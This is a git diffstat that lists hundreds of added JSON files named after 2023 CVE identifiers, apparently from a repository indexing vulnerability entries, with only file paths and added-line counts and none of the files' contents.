2023/CVE-2023-20918.json | 64 + 2023/CVE-2023-20921.json | 33 + 2023/CVE-2023-20933.json | 64 + 2023/CVE-2023-20943.json | 64 + 2023/CVE-2023-20944.json | 64 + 2023/CVE-2023-20945.json | 33 + 2023/CVE-2023-20955.json | 33 + 2023/CVE-2023-20963.json | 95 + 2023/CVE-2023-21036.json | 136 + 2023/CVE-2023-21086.json | 33 + 2023/CVE-2023-21094.json | 33 + 2023/CVE-2023-21097.json | 64 + 2023/CVE-2023-21109.json | 64 + 2023/CVE-2023-21118.json | 64 + 2023/CVE-2023-2114.json | 33 + 2023/CVE-2023-21144.json | 64 + 2023/CVE-2023-2123.json | 36 + 2023/CVE-2023-21238.json | 33 + 2023/CVE-2023-21246.json | 33 + 2023/CVE-2023-21251.json | 33 + 2023/CVE-2023-21272.json | 64 + 2023/CVE-2023-21275.json | 33 + 2023/CVE-2023-21281.json | 33 + 2023/CVE-2023-21282.json | 64 + 2023/CVE-2023-21284.json | 33 + 2023/CVE-2023-21285.json | 33 + 2023/CVE-2023-21286.json | 33 + 2023/CVE-2023-21288.json | 33 + 2023/CVE-2023-21537.json | 33 + 2023/CVE-2023-21554.json | 95 + 2023/CVE-2023-21560.json | 44 + 2023/CVE-2023-21608.json | 83 + 2023/CVE-2023-2163.json | 33 + 2023/CVE-2023-21674.json | 33 + 2023/CVE-2023-21707.json | 33 + 2023/CVE-2023-21716.json | 312 + 2023/CVE-2023-21739.json | 33 + 2023/CVE-2023-21742.json | 33 + 2023/CVE-2023-21746.json | 33 + 2023/CVE-2023-21752.json | 64 + 2023/CVE-2023-21766.json | 33 + 2023/CVE-2023-21768.json | 351 + 2023/CVE-2023-21823.json | 33 + 2023/CVE-2023-21837.json | 33 + 2023/CVE-2023-21839.json | 223 + 2023/CVE-2023-21887.json | 33 + 2023/CVE-2023-21931.json | 33 + 2023/CVE-2023-21939.json | 33 + 2023/CVE-2023-21971.json | 33 + 2023/CVE-2023-21987.json | 33 + 2023/CVE-2023-22074.json | 33 + 2023/CVE-2023-22098.json | 33 + 2023/CVE-2023-2215.json | 33 + 2023/CVE-2023-22432.json | 33 + 2023/CVE-2023-2249.json | 41 + 2023/CVE-2023-22490.json | 33 + 2023/CVE-2023-22515.json | 818 ++ 2023/CVE-2023-22518.json | 241 + 2023/CVE-2023-22524.json | 68 + 2023/CVE-2023-22527.json | 749 ++ 2023/CVE-2023-2255.json | 64 + 2023/CVE-2023-22551.json | 33 + 2023/CVE-2023-22621.json | 33 + 2023/CVE-2023-22622.json | 33 + 2023/CVE-2023-22726.json | 33 + 2023/CVE-2023-22809.json | 357 + 2023/CVE-2023-22855.json | 33 + 2023/CVE-2023-22884.json | 33 + 2023/CVE-2023-22894.json | 33 + 2023/CVE-2023-22906.json | 37 + 2023/CVE-2023-22941.json | 33 + 2023/CVE-2023-22960.json | 40 + 2023/CVE-2023-22974.json | 33 + 2023/CVE-2023-23138.json | 33 + 2023/CVE-2023-23169.json | 33 + 2023/CVE-2023-23192.json | 64 + 2023/CVE-2023-23279.json | 33 + 2023/CVE-2023-23333.json | 95 + 2023/CVE-2023-23388.json | 33 + 2023/CVE-2023-23396.json | 53 + 2023/CVE-2023-23397.json | 919 ++ 2023/CVE-2023-23488.json | 64 + 2023/CVE-2023-23531.json | 33 + 2023/CVE-2023-23583.json | 33 + 2023/CVE-2023-23607.json | 33 + 2023/CVE-2023-23638.json | 95 + 2023/CVE-2023-2375.json | 33 + 2023/CVE-2023-23752.json | 1490 +++ 2023/CVE-2023-23924.json | 33 + 2023/CVE-2023-23946.json | 33 + 2023/CVE-2023-24044.json | 40 + 2023/CVE-2023-24055.json | 229 + 2023/CVE-2023-24059.json | 33 + 2023/CVE-2023-24078.json | 95 + 2023/CVE-2023-24100.json | 33 + 2023/CVE-2023-24203.json | 33 + 2023/CVE-2023-24249.json | 33 + 2023/CVE-2023-24278.json | 33 + 2023/CVE-2023-24317.json | 33 + 2023/CVE-2023-24329.json | 95 + 2023/CVE-2023-2437.json | 33 + 2023/CVE-2023-24488.json | 128 + 2023/CVE-2023-24489.json | 64 + 2023/CVE-2023-24517.json | 33 + 2023/CVE-2023-24538.json | 64 + 2023/CVE-2023-24610.json | 33 + 2023/CVE-2023-24706.json | 33 + 2023/CVE-2023-24709.json | 39 + 2023/CVE-2023-24749.json | 36 + 2023/CVE-2023-24775.json | 33 + 2023/CVE-2023-24871.json | 33 + 2023/CVE-2023-24955.json | 33 + 2023/CVE-2023-24998.json | 33 + 2023/CVE-2023-25136.json | 287 + 2023/CVE-2023-25157.json | 205 + 2023/CVE-2023-2516.json | 33 + 2023/CVE-2023-25194.json | 98 + 2023/CVE-2023-25202.json | 33 + 2023/CVE-2023-25203.json | 33 + 2023/CVE-2023-2523.json | 64 + 2023/CVE-2023-25234.json | 33 + 2023/CVE-2023-25260.json | 33 + 2023/CVE-2023-25261.json | 33 + 2023/CVE-2023-25262.json | 33 + 2023/CVE-2023-25263.json | 33 + 2023/CVE-2023-25292.json | 64 + 2023/CVE-2023-25355.json | 33 + 2023/CVE-2023-25581.json | 33 + 2023/CVE-2023-25610.json | 33 + 2023/CVE-2023-25690.json | 107 + 2023/CVE-2023-25725.json | 33 + 2023/CVE-2023-2579.json | 39 + 2023/CVE-2023-25813.json | 157 + 2023/CVE-2023-2591.json | 33 + 2023/CVE-2023-2594.json | 33 + 2023/CVE-2023-25950.json | 42 + 2023/CVE-2023-2598.json | 95 + 2023/CVE-2023-2603.json | 33 + 2023/CVE-2023-26035.json | 170 + 2023/CVE-2023-26048.json | 64 + 2023/CVE-2023-26049.json | 33 + 2023/CVE-2023-26067.json | 33 + 2023/CVE-2023-26136.json | 95 + 2023/CVE-2023-26144.json | 33 + 2023/CVE-2023-26255.json | 64 + 2023/CVE-2023-26256.json | 126 + 2023/CVE-2023-26258.json | 33 + 2023/CVE-2023-26262.json | 33 + 2023/CVE-2023-26269.json | 41 + 2023/CVE-2023-2636.json | 33 + 2023/CVE-2023-26360.json | 126 + 2023/CVE-2023-2640.json | 219 + 2023/CVE-2023-2645.json | 33 + 2023/CVE-2023-26469.json | 33 + 2023/CVE-2023-2650.json | 33 + 2023/CVE-2023-26563.json | 33 + 2023/CVE-2023-26602.json | 33 + 2023/CVE-2023-26607.json | 33 + 2023/CVE-2023-26609.json | 33 + 2023/CVE-2023-26692.json | 33 + 2023/CVE-2023-26785.json | 33 + 2023/CVE-2023-26818.json | 33 + 2023/CVE-2023-26852.json | 33 + 2023/CVE-2023-26866.json | 33 + 2023/CVE-2023-26976.json | 33 + 2023/CVE-2023-26982.json | 64 + 2023/CVE-2023-26984.json | 33 + 2023/CVE-2023-27035.json | 33 + 2023/CVE-2023-27100.json | 64 + 2023/CVE-2023-27163.json | 544 + 2023/CVE-2023-27216.json | 64 + 2023/CVE-2023-2728.json | 33 + 2023/CVE-2023-2732.json | 99 + 2023/CVE-2023-27326.json | 73 + 2023/CVE-2023-27327.json | 33 + 2023/CVE-2023-27350.json | 254 + 2023/CVE-2023-27363.json | 95 + 2023/CVE-2023-27372.json | 269 + 2023/CVE-2023-2744.json | 33 + 2023/CVE-2023-27470.json | 33 + 2023/CVE-2023-27524.json | 387 + 2023/CVE-2023-27532.json | 95 + 2023/CVE-2023-27564.json | 33 + 2023/CVE-2023-27566.json | 40 + 2023/CVE-2023-27587.json | 33 + 2023/CVE-2023-27703.json | 33 + 2023/CVE-2023-27704.json | 33 + 2023/CVE-2023-27742.json | 33 + 2023/CVE-2023-27746.json | 37 + 2023/CVE-2023-27842.json | 64 + 2023/CVE-2023-27997.json | 281 + 2023/CVE-2023-28121.json | 204 + 2023/CVE-2023-28197.json | 33 + 2023/CVE-2023-28205.json | 42 + 2023/CVE-2023-28206.json | 33 + 2023/CVE-2023-28218.json | 33 + 2023/CVE-2023-2822.json | 33 + 2023/CVE-2023-28229.json | 64 + 2023/CVE-2023-28231.json | 33 + 2023/CVE-2023-28244.json | 33 + 2023/CVE-2023-2825.json | 222 + 2023/CVE-2023-28252.json | 219 + 2023/CVE-2023-28293.json | 33 + 2023/CVE-2023-28324.json | 33 + 2023/CVE-2023-28329.json | 33 + 2023/CVE-2023-2833.json | 33 + 2023/CVE-2023-28330.json | 33 + 2023/CVE-2023-28343.json | 95 + 2023/CVE-2023-28354.json | 33 + 2023/CVE-2023-28432.json | 594 + 2023/CVE-2023-28434.json | 36 + 2023/CVE-2023-28447.json | 33 + 2023/CVE-2023-28467.json | 33 + 2023/CVE-2023-28588.json | 188 + 2023/CVE-2023-2859.json | 33 + 2023/CVE-2023-2868.json | 95 + 2023/CVE-2023-28753.json | 33 + 2023/CVE-2023-2877.json | 33 + 2023/CVE-2023-28771.json | 35 + 2023/CVE-2023-28772.json | 95 + 2023/CVE-2023-28810.json | 33 + 2023/CVE-2023-29007.json | 97 + 2023/CVE-2023-29017.json | 64 + 2023/CVE-2023-29084.json | 33 + 2023/CVE-2023-2916.json | 33 + 2023/CVE-2023-2928.json | 33 + 2023/CVE-2023-29324.json | 33 + 2023/CVE-2023-29336.json | 33 + 2023/CVE-2023-29343.json | 33 + 2023/CVE-2023-29357.json | 195 + 2023/CVE-2023-29360.json | 64 + 2023/CVE-2023-29384.json | 33 + 2023/CVE-2023-29406.json | 33 + 2023/CVE-2023-29409.json | 33 + 2023/CVE-2023-29439.json | 33 + 2023/CVE-2023-29478.json | 33 + 2023/CVE-2023-29489.json | 612 + 2023/CVE-2023-2951.json | 33 + 2023/CVE-2023-29808.json | 33 + 2023/CVE-2023-29809.json | 33 + 2023/CVE-2023-2982.json | 126 + 2023/CVE-2023-29839.json | 33 + 2023/CVE-2023-2986.json | 73 + 2023/CVE-2023-29919.json | 33 + 2023/CVE-2023-29922.json | 33 + 2023/CVE-2023-29923.json | 95 + 2023/CVE-2023-29929.json | 33 + 2023/CVE-2023-29930.json | 33 + 2023/CVE-2023-29983.json | 33 + 2023/CVE-2023-30033.json | 33 + 2023/CVE-2023-3009.json | 33 + 2023/CVE-2023-30092.json | 33 + 2023/CVE-2023-30145.json | 33 + 2023/CVE-2023-30146.json | 38 + 2023/CVE-2023-30185.json | 33 + 2023/CVE-2023-30190.json | 33 + 2023/CVE-2023-30212.json | 498 + 2023/CVE-2023-30226.json | 33 + 2023/CVE-2023-30253.json | 223 + 2023/CVE-2023-30256.json | 33 + 2023/CVE-2023-30258.json | 33 + 2023/CVE-2023-30347.json | 33 + 2023/CVE-2023-30367.json | 33 + 2023/CVE-2023-30383.json | 33 + 2023/CVE-2023-30458.json | 33 + 2023/CVE-2023-30459.json | 33 + 2023/CVE-2023-3047.json | 64 + 2023/CVE-2023-30486.json | 33 + 2023/CVE-2023-30533.json | 33 + 2023/CVE-2023-30547.json | 126 + 2023/CVE-2023-3076.json | 44 + 2023/CVE-2023-30765.json | 33 + 2023/CVE-2023-30777.json | 33 + 2023/CVE-2023-3079.json | 33 + 2023/CVE-2023-30800.json | 133 + 2023/CVE-2023-30839.json | 33 + 2023/CVE-2023-30845.json | 33 + 2023/CVE-2023-30854.json | 33 + 2023/CVE-2023-30943.json | 95 + 2023/CVE-2023-31070.json | 33 + 2023/CVE-2023-3124.json | 38 + 2023/CVE-2023-31290.json | 37 + 2023/CVE-2023-31320.json | 41 + 2023/CVE-2023-31346.json | 33 + 2023/CVE-2023-31355.json | 33 + 2023/CVE-2023-31419.json | 64 + 2023/CVE-2023-31433.json | 33 + 2023/CVE-2023-31434.json | 33 + 2023/CVE-2023-31435.json | 33 + 2023/CVE-2023-31443.json | 33 + 2023/CVE-2023-31445.json | 33 + 2023/CVE-2023-31446.json | 33 + 2023/CVE-2023-31497.json | 38 + 2023/CVE-2023-31541.json | 33 + 2023/CVE-2023-31546.json | 33 + 2023/CVE-2023-31584.json | 33 + 2023/CVE-2023-31594.json | 33 + 2023/CVE-2023-31595.json | 33 + 2023/CVE-2023-31606.json | 33 + 2023/CVE-2023-3163.json | 33 + 2023/CVE-2023-31634.json | 33 + 2023/CVE-2023-31664.json | 33 + 2023/CVE-2023-31702.json | 33 + 2023/CVE-2023-31703.json | 33 + 2023/CVE-2023-31704.json | 33 + 2023/CVE-2023-31705.json | 33 + 2023/CVE-2023-31711.json | 33 + 2023/CVE-2023-31714.json | 33 + 2023/CVE-2023-31716.json | 33 + 2023/CVE-2023-31717.json | 33 + 2023/CVE-2023-31718.json | 33 + 2023/CVE-2023-31719.json | 33 + 2023/CVE-2023-31726.json | 33 + 2023/CVE-2023-31747.json | 33 + 2023/CVE-2023-31753.json | 33 + 2023/CVE-2023-31756.json | 33 + 2023/CVE-2023-31779.json | 33 + 2023/CVE-2023-31851.json | 33 + 2023/CVE-2023-31852.json | 33 + 2023/CVE-2023-31853.json | 33 + 2023/CVE-2023-32031.json | 33 + 2023/CVE-2023-32073.json | 33 + 2023/CVE-2023-32117.json | 33 + 2023/CVE-2023-32162.json | 54 + 2023/CVE-2023-32163.json | 54 + 2023/CVE-2023-32233.json | 157 + 2023/CVE-2023-32235.json | 33 + 2023/CVE-2023-32243.json | 322 + 2023/CVE-2023-32314.json | 33 + 2023/CVE-2023-32315.json | 320 + 2023/CVE-2023-32353.json | 33 + 2023/CVE-2023-32364.json | 33 + 2023/CVE-2023-32407.json | 33 + 2023/CVE-2023-32413.json | 33 + 2023/CVE-2023-32422.json | 33 + 2023/CVE-2023-32428.json | 33 + 2023/CVE-2023-3244.json | 33 + 2023/CVE-2023-32560.json | 64 + 2023/CVE-2023-32571.json | 70 + 2023/CVE-2023-32629.json | 126 + 2023/CVE-2023-32681.json | 33 + 2023/CVE-2023-3269.json | 33 + 2023/CVE-2023-32707.json | 33 + 2023/CVE-2023-32749.json | 37 + 2023/CVE-2023-32784.json | 377 + 2023/CVE-2023-32961.json | 33 + 2023/CVE-2023-33105.json | 33 + 2023/CVE-2023-33242.json | 33 + 2023/CVE-2023-33243.json | 33 + 2023/CVE-2023-33246.json | 443 + 2023/CVE-2023-33253.json | 33 + 2023/CVE-2023-33264.json | 95 + 2023/CVE-2023-3338.json | 33 + 2023/CVE-2023-33381.json | 33 + 2023/CVE-2023-33404.json | 33 + 2023/CVE-2023-33405.json | 33 + 2023/CVE-2023-33408.json | 33 + 2023/CVE-2023-33409.json | 33 + 2023/CVE-2023-33410.json | 33 + 2023/CVE-2023-33476.json | 37 + 2023/CVE-2023-33477.json | 33 + 2023/CVE-2023-33517.json | 33 + 2023/CVE-2023-33580.json | 41 + 2023/CVE-2023-33592.json | 33 + 2023/CVE-2023-33617.json | 64 + 2023/CVE-2023-33668.json | 33 + 2023/CVE-2023-33669.json | 64 + 2023/CVE-2023-33730.json | 33 + 2023/CVE-2023-33731.json | 33 + 2023/CVE-2023-33732.json | 33 + 2023/CVE-2023-33733.json | 157 + 2023/CVE-2023-33747.json | 33 + 2023/CVE-2023-33768.json | 64 + 2023/CVE-2023-33781.json | 33 + 2023/CVE-2023-33782.json | 33 + 2023/CVE-2023-33802.json | 33 + 2023/CVE-2023-33817.json | 33 + 2023/CVE-2023-33829.json | 69 + 2023/CVE-2023-33831.json | 68 + 2023/CVE-2023-3390.json | 33 + 2023/CVE-2023-33902.json | 33 + 2023/CVE-2023-33977.json | 38 + 2023/CVE-2023-34034.json | 33 + 2023/CVE-2023-34035.json | 64 + 2023/CVE-2023-34039.json | 157 + 2023/CVE-2023-34040.json | 126 + 2023/CVE-2023-34050.json | 33 + 2023/CVE-2023-34051.json | 33 + 2023/CVE-2023-34092.json | 33 + 2023/CVE-2023-34096.json | 37 + 2023/CVE-2023-34152.json | 64 + 2023/CVE-2023-34194.json | 33 + 2023/CVE-2023-34212.json | 41 + 2023/CVE-2023-34312.json | 64 + 2023/CVE-2023-34362.json | 329 + 2023/CVE-2023-34458.json | 95 + 2023/CVE-2023-34468.json | 40 + 2023/CVE-2023-3450.json | 64 + 2023/CVE-2023-3452.json | 33 + 2023/CVE-2023-34537.json | 33 + 2023/CVE-2023-34584.json | 33 + 2023/CVE-2023-34598.json | 64 + 2023/CVE-2023-34599.json | 33 + 2023/CVE-2023-3460.json | 284 + 2023/CVE-2023-34600.json | 33 + 2023/CVE-2023-34634.json | 33 + 2023/CVE-2023-34830.json | 33 + 2023/CVE-2023-34835.json | 33 + 2023/CVE-2023-34836.json | 33 + 2023/CVE-2023-34837.json | 33 + 2023/CVE-2023-34838.json | 33 + 2023/CVE-2023-34839.json | 33 + 2023/CVE-2023-34840.json | 33 + 2023/CVE-2023-34843.json | 33 + 2023/CVE-2023-34845.json | 33 + 2023/CVE-2023-34852.json | 33 + 2023/CVE-2023-34853.json | 33 + 2023/CVE-2023-34924.json | 33 + 2023/CVE-2023-34960.json | 246 + 2023/CVE-2023-34965.json | 33 + 2023/CVE-2023-34992.json | 64 + 2023/CVE-2023-35001.json | 95 + 2023/CVE-2023-35078.json | 221 + 2023/CVE-2023-35080.json | 33 + 2023/CVE-2023-35082.json | 33 + 2023/CVE-2023-35086.json | 33 + 2023/CVE-2023-3519.json | 414 + 2023/CVE-2023-35636.json | 33 + 2023/CVE-2023-35671.json | 33 + 2023/CVE-2023-35674.json | 64 + 2023/CVE-2023-35687.json | 33 + 2023/CVE-2023-35744.json | 33 + 2023/CVE-2023-35793.json | 33 + 2023/CVE-2023-35794.json | 33 + 2023/CVE-2023-35801.json | 33 + 2023/CVE-2023-35803.json | 33 + 2023/CVE-2023-35813.json | 64 + 2023/CVE-2023-35828.json | 33 + 2023/CVE-2023-35840.json | 33 + 2023/CVE-2023-35843.json | 64 + 2023/CVE-2023-35844.json | 33 + 2023/CVE-2023-35854.json | 33 + 2023/CVE-2023-35885.json | 64 + 2023/CVE-2023-35985.json | 64 + 2023/CVE-2023-36003.json | 64 + 2023/CVE-2023-36025.json | 95 + 2023/CVE-2023-36076.json | 33 + 2023/CVE-2023-36085.json | 33 + 2023/CVE-2023-36109.json | 33 + 2023/CVE-2023-36123.json | 33 + 2023/CVE-2023-36143.json | 64 + 2023/CVE-2023-36144.json | 33 + 2023/CVE-2023-36146.json | 33 + 2023/CVE-2023-36158.json | 33 + 2023/CVE-2023-36159.json | 33 + 2023/CVE-2023-36163.json | 33 + 2023/CVE-2023-36164.json | 33 + 2023/CVE-2023-36165.json | 33 + 2023/CVE-2023-36168.json | 33 + 2023/CVE-2023-36169.json | 33 + 2023/CVE-2023-36250.json | 33 + 2023/CVE-2023-36281.json | 95 + 2023/CVE-2023-36319.json | 33 + 2023/CVE-2023-3640.json | 33 + 2023/CVE-2023-36407.json | 64 + 2023/CVE-2023-36424.json | 33 + 2023/CVE-2023-36427.json | 36 + 2023/CVE-2023-36531.json | 33 + 2023/CVE-2023-36643.json | 33 + 2023/CVE-2023-36644.json | 33 + 2023/CVE-2023-36645.json | 33 + 2023/CVE-2023-36664.json | 126 + 2023/CVE-2023-36723.json | 33 + 2023/CVE-2023-36745.json | 33 + 2023/CVE-2023-36802.json | 157 + 2023/CVE-2023-36812.json | 33 + 2023/CVE-2023-36844.json | 95 + 2023/CVE-2023-36845.json | 582 + 2023/CVE-2023-36846.json | 33 + 2023/CVE-2023-36874.json | 126 + 2023/CVE-2023-36884.json | 289 + 2023/CVE-2023-36899.json | 64 + 2023/CVE-2023-36900.json | 46 + 2023/CVE-2023-37073.json | 33 + 2023/CVE-2023-3710.json | 37 + 2023/CVE-2023-3711.json | 37 + 2023/CVE-2023-3712.json | 37 + 2023/CVE-2023-37164.json | 33 + 2023/CVE-2023-37189.json | 33 + 2023/CVE-2023-37190.json | 33 + 2023/CVE-2023-37191.json | 33 + 2023/CVE-2023-3722.json | 33 + 2023/CVE-2023-37250.json | 33 + 2023/CVE-2023-37474.json | 33 + 2023/CVE-2023-37478.json | 64 + 2023/CVE-2023-37582.json | 33 + 2023/CVE-2023-37596.json | 33 + 2023/CVE-2023-37597.json | 33 + 2023/CVE-2023-37598.json | 33 + 2023/CVE-2023-37599.json | 33 + 2023/CVE-2023-37621.json | 33 + 2023/CVE-2023-37625.json | 33 + 2023/CVE-2023-37739.json | 33 + 2023/CVE-2023-37755.json | 33 + 2023/CVE-2023-37756.json | 33 + 2023/CVE-2023-37771.json | 33 + 2023/CVE-2023-37772.json | 33 + 2023/CVE-2023-37778.json | 33 + 2023/CVE-2023-37779.json | 33 + 2023/CVE-2023-37786.json | 33 + 2023/CVE-2023-37790.json | 33 + 2023/CVE-2023-37800.json | 33 + 2023/CVE-2023-37903.json | 33 + 2023/CVE-2023-37941.json | 33 + 2023/CVE-2023-37979.json | 64 + 2023/CVE-2023-38035.json | 95 + 2023/CVE-2023-38039.json | 33 + 2023/CVE-2023-38041.json | 33 + 2023/CVE-2023-38120.json | 33 + 2023/CVE-2023-38146.json | 104 + 2023/CVE-2023-3824.json | 33 + 2023/CVE-2023-3836.json | 33 + 2023/CVE-2023-38408.json | 225 + 2023/CVE-2023-38434.json | 33 + 2023/CVE-2023-38490.json | 40 + 2023/CVE-2023-38497.json | 33 + 2023/CVE-2023-38499.json | 95 + 2023/CVE-2023-38545.json | 281 + 2023/CVE-2023-38571.json | 33 + 2023/CVE-2023-38609.json | 33 + 2023/CVE-2023-38632.json | 33 + 2023/CVE-2023-38646.json | 1206 ++ 2023/CVE-2023-38709.json | 44 + 2023/CVE-2023-38743.json | 33 + 2023/CVE-2023-3881.json | 33 + 2023/CVE-2023-38817.json | 37 + 2023/CVE-2023-38820.json | 33 + 2023/CVE-2023-38821.json | 33 + 2023/CVE-2023-38822.json | 33 + 2023/CVE-2023-38829.json | 64 + 2023/CVE-2023-38831.json | 1701 +++ 2023/CVE-2023-38836.json | 33 + 2023/CVE-2023-38840.json | 40 + 2023/CVE-2023-38890.json | 33 + 2023/CVE-2023-38891.json | 33 + 2023/CVE-2023-3897.json | 33 + 2023/CVE-2023-39024.json | 33 + 2023/CVE-2023-39062.json | 33 + 2023/CVE-2023-39063.json | 39 + 2023/CVE-2023-39115.json | 33 + 2023/CVE-2023-39144.json | 33 + 2023/CVE-2023-39320.json | 33 + 2023/CVE-2023-39361.json | 33 + 2023/CVE-2023-39362.json | 70 + 2023/CVE-2023-39526.json | 33 + 2023/CVE-2023-39539.json | 33 + 2023/CVE-2023-39593.json | 33 + 2023/CVE-2023-39707.json | 33 + 2023/CVE-2023-39708.json | 33 + 2023/CVE-2023-39709.json | 33 + 2023/CVE-2023-3971.json | 33 + 2023/CVE-2023-39710.json | 33 + 2023/CVE-2023-39711.json | 33 + 2023/CVE-2023-39712.json | 33 + 2023/CVE-2023-39714.json | 33 + 2023/CVE-2023-39725.json | 33 + 2023/CVE-2023-40000.json | 104 + 2023/CVE-2023-40028.json | 197 + 2023/CVE-2023-40031.json | 33 + 2023/CVE-2023-40037.json | 43 + 2023/CVE-2023-40044.json | 33 + 2023/CVE-2023-40084.json | 33 + 2023/CVE-2023-40109.json | 33 + 2023/CVE-2023-40121.json | 64 + 2023/CVE-2023-40127.json | 157 + 2023/CVE-2023-40133.json | 33 + 2023/CVE-2023-40140.json | 64 + 2023/CVE-2023-40275.json | 33 + 2023/CVE-2023-40276.json | 33 + 2023/CVE-2023-40277.json | 33 + 2023/CVE-2023-40278.json | 33 + 2023/CVE-2023-40279.json | 33 + 2023/CVE-2023-40280.json | 33 + 2023/CVE-2023-40294.json | 33 + 2023/CVE-2023-40296.json | 33 + 2023/CVE-2023-40297.json | 33 + 2023/CVE-2023-40361.json | 33 + 2023/CVE-2023-40362.json | 33 + 2023/CVE-2023-40404.json | 50 + 2023/CVE-2023-40429.json | 33 + 2023/CVE-2023-40459.json | 64 + 2023/CVE-2023-40477.json | 64 + 2023/CVE-2023-40600.json | 33 + 2023/CVE-2023-40626.json | 39 + 2023/CVE-2023-40868.json | 33 + 2023/CVE-2023-40869.json | 33 + 2023/CVE-2023-40924.json | 33 + 2023/CVE-2023-40930.json | 33 + 2023/CVE-2023-40931.json | 64 + 2023/CVE-2023-40933.json | 33 + 2023/CVE-2023-40989.json | 33 + 2023/CVE-2023-41064.json | 95 + 2023/CVE-2023-41080.json | 33 + 2023/CVE-2023-41265.json | 33 + 2023/CVE-2023-4128.json | 33 + 2023/CVE-2023-41362.json | 33 + 2023/CVE-2023-41425.json | 418 + 2023/CVE-2023-41436.json | 33 + 2023/CVE-2023-4145.json | 95 + 2023/CVE-2023-4147.json | 33 + 2023/CVE-2023-41474.json | 33 + 2023/CVE-2023-41507.json | 33 + 2023/CVE-2023-41508.json | 33 + 2023/CVE-2023-41533.json | 33 + 2023/CVE-2023-41534.json | 33 + 2023/CVE-2023-41535.json | 33 + 2023/CVE-2023-41564.json | 33 + 2023/CVE-2023-41575.json | 33 + 2023/CVE-2023-41592.json | 95 + 2023/CVE-2023-41593.json | 33 + 2023/CVE-2023-41613.json | 33 + 2023/CVE-2023-41623.json | 33 + 2023/CVE-2023-41646.json | 33 + 2023/CVE-2023-4165.json | 33 + 2023/CVE-2023-41652.json | 33 + 2023/CVE-2023-4166.json | 33 + 2023/CVE-2023-4169.json | 33 + 2023/CVE-2023-41717.json | 33 + 2023/CVE-2023-4174.json | 33 + 2023/CVE-2023-41772.json | 33 + 2023/CVE-2023-41892.json | 161 + 2023/CVE-2023-4197.json | 33 + 2023/CVE-2023-41991.json | 33 + 2023/CVE-2023-41993.json | 167 + 2023/CVE-2023-4206.json | 33 + 2023/CVE-2023-42115.json | 64 + 2023/CVE-2023-422.json | 33 + 2023/CVE-2023-4220.json | 721 ++ 2023/CVE-2023-42222.json | 33 + 2023/CVE-2023-4226.json | 33 + 2023/CVE-2023-42283.json | 33 + 2023/CVE-2023-42284.json | 33 + 2023/CVE-2023-42326.json | 33 + 2023/CVE-2023-42362.json | 33 + 2023/CVE-2023-42413.json | 33 + 2023/CVE-2023-42426.json | 33 + 2023/CVE-2023-42442.json | 99 + 2023/CVE-2023-42468.json | 35 + 2023/CVE-2023-42469.json | 33 + 2023/CVE-2023-42470.json | 36 + 2023/CVE-2023-42471.json | 33 + 2023/CVE-2023-4278.json | 33 + 2023/CVE-2023-42789.json | 33 + 2023/CVE-2023-4279.json | 33 + 2023/CVE-2023-42793.json | 358 + 2023/CVE-2023-4281.json | 33 + 2023/CVE-2023-42819.json | 33 + 2023/CVE-2023-42820.json | 64 + 2023/CVE-2023-42860.json | 41 + 2023/CVE-2023-42931.json | 33 + 2023/CVE-2023-4294.json | 33 + 2023/CVE-2023-4300.json | 33 + 2023/CVE-2023-43040.json | 33 + 2023/CVE-2023-43115.json | 33 + 2023/CVE-2023-43144.json | 33 + 2023/CVE-2023-43147.json | 33 + 2023/CVE-2023-43148.json | 33 + 2023/CVE-2023-43149.json | 33 + 2023/CVE-2023-43154.json | 33 + 2023/CVE-2023-43177.json | 33 + 2023/CVE-2023-43208.json | 140 + 2023/CVE-2023-43261.json | 35 + 2023/CVE-2023-43263.json | 33 + 2023/CVE-2023-43284.json | 33 + 2023/CVE-2023-43317.json | 33 + 2023/CVE-2023-43318.json | 33 + 2023/CVE-2023-43323.json | 33 + 2023/CVE-2023-43325.json | 35 + 2023/CVE-2023-43326.json | 33 + 2023/CVE-2023-43339.json | 33 + 2023/CVE-2023-43340.json | 33 + 2023/CVE-2023-43341.json | 33 + 2023/CVE-2023-43342.json | 33 + 2023/CVE-2023-43343.json | 33 + 2023/CVE-2023-43344.json | 33 + 2023/CVE-2023-43345.json | 33 + 2023/CVE-2023-43346.json | 33 + 2023/CVE-2023-43352.json | 33 + 2023/CVE-2023-43353.json | 33 + 2023/CVE-2023-43354.json | 33 + 2023/CVE-2023-43355.json | 33 + 2023/CVE-2023-43356.json | 33 + 2023/CVE-2023-43357.json | 33 + 2023/CVE-2023-43358.json | 33 + 2023/CVE-2023-43359.json | 33 + 2023/CVE-2023-43360.json | 33 + 2023/CVE-2023-43364.json | 33 + 2023/CVE-2023-43481.json | 35 + 2023/CVE-2023-43482.json | 33 + 2023/CVE-2023-43494.json | 33 + 2023/CVE-2023-4357.json | 221 + 2023/CVE-2023-43622.json | 33 + 2023/CVE-2023-43646.json | 33 + 2023/CVE-2023-43654.json | 64 + 2023/CVE-2023-43667.json | 95 + 2023/CVE-2023-43757.json | 33 + 2023/CVE-2023-43770.json | 64 + 2023/CVE-2023-43786.json | 33 + 2023/CVE-2023-43838.json | 33 + 2023/CVE-2023-43871.json | 33 + 2023/CVE-2023-43872.json | 33 + 2023/CVE-2023-43873.json | 33 + 2023/CVE-2023-43874.json | 33 + 2023/CVE-2023-43875.json | 33 + 2023/CVE-2023-43876.json | 33 + 2023/CVE-2023-43877.json | 33 + 2023/CVE-2023-43878.json | 33 + 2023/CVE-2023-43879.json | 33 + 2023/CVE-2023-43955.json | 35 + 2023/CVE-2023-44061.json | 33 + 2023/CVE-2023-4427.json | 33 + 2023/CVE-2023-44451.json | 33 + 2023/CVE-2023-44452.json | 33 + 2023/CVE-2023-44487.json | 472 + 2023/CVE-2023-4450.json | 33 + 2023/CVE-2023-4460.json | 35 + 2023/CVE-2023-44758.json | 33 + 2023/CVE-2023-44760.json | 33 + 2023/CVE-2023-44761.json | 33 + 2023/CVE-2023-44762.json | 33 + 2023/CVE-2023-44763.json | 33 + 2023/CVE-2023-44764.json | 33 + 2023/CVE-2023-44765.json | 33 + 2023/CVE-2023-44766.json | 33 + 2023/CVE-2023-44767.json | 33 + 2023/CVE-2023-44769.json | 33 + 2023/CVE-2023-44770.json | 33 + 2023/CVE-2023-44771.json | 33 + 2023/CVE-2023-44811.json | 33 + 2023/CVE-2023-44812.json | 33 + 2023/CVE-2023-44813.json | 33 + 2023/CVE-2023-44961.json | 33 + 2023/CVE-2023-44962.json | 33 + 2023/CVE-2023-44976.json | 33 + 2023/CVE-2023-45158.json | 33 + 2023/CVE-2023-45182.json | 33 + 2023/CVE-2023-45184.json | 33 + 2023/CVE-2023-45185.json | 33 + 2023/CVE-2023-45239.json | 33 + 